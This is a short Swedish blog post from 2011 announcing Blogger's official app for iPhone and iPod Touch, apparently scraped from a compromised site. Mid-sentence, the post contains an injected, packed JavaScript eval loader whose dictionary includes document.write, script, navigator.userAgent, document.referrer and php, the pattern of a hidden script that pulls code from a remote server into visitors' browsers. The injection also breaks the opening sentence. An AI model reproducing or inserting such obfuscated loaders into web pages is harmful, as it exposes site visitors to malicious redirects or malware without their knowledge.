Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Blogger app till iPhone/iPod Touch

Blogger app till iPhone/iPod Touch
Filip Urde
  • On 11 september, 2011
  • http://www.revue.se/filip-urde
Använder eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ybnad|var|u0026u|referrer|afaaz||js|php’.split(’|’),0,{}))
du dig av 
Blogger ? nu kan du uppdatera din blogg direkt i din telefon eller iPod Touch. Tidigare har man fått göra detta genom inofficiella appar. Men nu släpper Blogger alltså en egen app, som gör att du kan redigera dina inlägg direkt från telefonen.

Genom appen kan du publicera saker från flera olika Blogger-konton, som till exempel lägga upp bilder, tagga inlägg och publicera saker du har skrivit. Du kan även spara det du har gjort för senare publicering.

Har funnits till Android ett tag och kommer alltså nu även till iOS. Kostar gratis och hittas efter hoppet.
itunes.apple.com